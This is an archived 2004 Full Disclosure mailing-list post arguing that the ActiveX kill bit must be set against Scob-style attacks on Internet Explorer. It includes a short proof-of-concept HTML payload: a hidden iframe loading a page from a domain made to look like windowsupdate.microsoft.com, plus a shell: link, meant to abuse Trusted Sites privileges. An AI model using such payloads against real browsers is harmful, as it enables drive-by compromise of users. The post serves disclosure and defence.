Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: Registry Fix For Variant of Scob
From: "http-equiv () excite com" <1 () malware com>
Date: Tue, 6 Jul 2004 20:40:59 -0000

No reason to set the kill bit?

Take a look at

And I am quoting you now

"You should be able to use this to compromise Windows XP SP2 
through Internet Explorer despite the My Computer zone hardening 
since the Trusted Sites Zone has all of the privileges you need 
to plant and execute a file."


"A little experience often upsets a lot of theory" as the quote 

The so-called 'Trusted Zone' setting is by default 'LOW". It has 
long been the recommendation of one particlar party to suggest 
that in order to 'safely use the internet' deny everything else 
and allow only those that you trust. For example, 
windowsupdate.com, perhaps the holy shrine of this all:

[screen shot: http://www.malware.com/ihaveabridgeforsale.png 

all we then need to do and note that this is not the 'My 
Computer' Zone is sprinkle a bit of our magic dns into the nest, 
stir in a dollop of ActiveX and POOF ! magic:

<center><br><br><img src="nocigar.gif"></center>
<a href="shell:windowssnakeoil.txt">who goes there</a></center>
<iframe src="http://windowsupdate.microsoft.com%2F.http-
equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none">

[customise as you see fit]


USE THE KILL BIT PEOPLE ! Slaughter all the birds and crush all 
the eggs. Wipe the species out and forget about the nest 
forever !

There ain't no 'quick nothing' to any of this.

"The want of money is the root of all evil" was the other quote.


Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]